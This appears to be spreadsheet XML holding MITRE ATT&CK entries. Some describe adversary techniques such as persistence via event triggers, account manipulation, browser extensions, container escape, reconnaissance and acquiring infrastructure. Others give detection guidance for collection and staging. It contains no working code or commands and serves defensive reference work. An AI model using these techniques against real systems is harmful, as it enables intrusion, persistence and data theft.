    <t xml:space="preserve">Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.(Citation: Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)
Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)
Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons) 
Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.  
Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection)  </t>
  </si>
  <si>
    <t>Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. 
In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.</t>
  </si>
  <si>
    <t>Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.(Citation: volexity_0day_sophos_FW)</t>
  </si>
  <si>
    <t>Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)</t>
  </si>
  <si>
    <t>Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
Adversaries may abuse system utilities and configuration settings to maintain access by preventing machines from entering a state, such as standby, that can terminate malicious activity.(Citation: Microsoft: Powercfg command-line options)(Citation: systemdsleep Linux)
For example, `powercfg` controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.(Citation: Two New Monero Malware Attacks Target Windows and Android Users) Adversaries may also extend system lock screen timeout settings.(Citation: BATLOADER: The Evasive Downloader Malware) Other relevant settings, such as disk and hibernate timeout, can be similarly abused to keep the infected machine running even if no user is active.(Citation: CoinLoader: A Sophisticated Malware Loader Campaign)
Aware that some malware cannot survive system reboots, adversaries may entirely delete files used to invoke system shut down or reboot.(Citation: Condi-Botnet-binaries)</t>
  </si>
  <si>
    <t>Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: 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it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.
Previous to macOS 11, adversaries could silently install browser extensions via the command line using the &lt;code&gt;profiles&lt;/code&gt; tool to install malicious &lt;code&gt;.mobileconfig&lt;/code&gt; files. In macOS 11+, the use of the &lt;code&gt;profiles&lt;/code&gt; tool can no longer install configuration profiles, however &lt;code&gt;.mobileconfig&lt;/code&gt; files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)
Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension)
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command &amp; control.(Citation: Chrome Extension C2 Malware)</t>
  </si>
  <si>
    <t>Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.</t>
  </si>
  <si>
    <t>Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.
Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.</t>
  </si>
  <si>
    <t>Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)</t>
  </si>
  <si>
    <t>Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)
There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask)
Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)
Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities in an attempt to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could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.
Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).</t>
  </si>
  <si>
    <t>Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
Adversaries may search in different online sites depending on what information they seek to gather.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[External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting)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t>
  </si>
  <si>
    <t>Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)
Adversaries may search in different open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</si>
  <si>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Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed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t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).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t>
  </si>
  <si>
    <t>Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
Adversaries may search victim-owned websites to gather actionable information.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[Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks)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t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks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</si>
  <si>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Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search)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 or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)
In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.
Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090), including from residential proxy services.(Citation: amnesty_nso_pegasus)(Citation: FBI Proxies Credential Stuffing)(Citation: Mandiant APT29 Microsoft 365 2022) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.</t>
  </si>
  <si>
    <t>Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 
A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.
Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090) and/or proxyware services.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking)
By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)</t>
  </si>
  <si>
    <t>Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)
Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):
* Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)
* Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)
* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020)
* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert)</t>
  </si>
  <si>
    <t>Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)(Citation: Krebs Access Brokers Fortune 500) In some cases, adversary groups may form partnerships to share compromised systems with each other.(Citation: CISA Karakurt 2022)
Footholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://attack.mitre.org/techniques/T1505/003)) or established access via [External Remote Services](https://attack.mitre.org/techniques/T1133). In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.(Citation: Microsoft Ransomware as a Service)
By leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.(Citation: Microsoft Ransomware as a Service)(Citation: CrowdStrike Access Brokers)
In some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://attack.mitre.org/techniques/T1199), [Multi-Factor Authentication Interception](https://attack.mitre.org/techniques/T1111), or even [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195).
**Note:** while this technique is distinct from other behaviors such as [Purchase Technical Data](https://attack.mitre.org/techniques/T1597/002) and [Credentials](https://attack.mitre.org/techniques/T1589/001), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.</t>
  </si>
  <si>
    <t>Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.
Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)</t>
  </si>
  <si>
    <t xml:space="preserve">As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) Sharepoint audit logging can also be configured to report when a user shares a resource. (Citation: Sharepoint Sharing Events) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities. </t>
  </si>
  <si>
    <t>There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
File access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.
Monitor processes and command-line arguments for actions that could be taken to gather local email files.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Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include &lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; set to true, &lt;code&gt;X-MailFwdBy&lt;/code&gt; and &lt;code&gt;X-Forwarded-To&lt;/code&gt;. The &lt;code&gt;forwardingSMTPAddress&lt;/code&gt; parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the &lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.</t>
  </si>
  <si>
    <t>Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.</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</si>
  <si>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video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.</t>
  </si>
  <si>
    <t>Monitor network traffic for anomalies associated with known AiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.</t>
  </si>
  <si>
    <t>Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), and ensuring no unauthorized drivers or kernel modules that could indicate keylogging or API hooking are present.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media.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[PowerShell](https://attack.mitre.org/techniques/T1059/001).</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</si>
  <si>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microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.</t>
  </si>
  <si>
    <t>This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. New processes may not be created and no additional software dropped to disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.</t>
  </si>
  <si>
    <t>Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to collect files such as configuration files with built-in features native to the network device platform.(Citation: Mandiant APT41 Global Intrusion )(Citation: US-CERT-TA18-106A) Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
For network infrastructure devices, collect AAA logging to monitor `show` commands that view configuration files. </t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a network share.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[PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.</t>
  </si>
  <si>
    <t>Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.</t>
  </si>
  <si>
    <t>Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior.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[PowerShell](https://attack.mitre.org/techniques/T1059/001), as well as through cloud APIs and command line interfaces.</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</si>
  <si>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standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
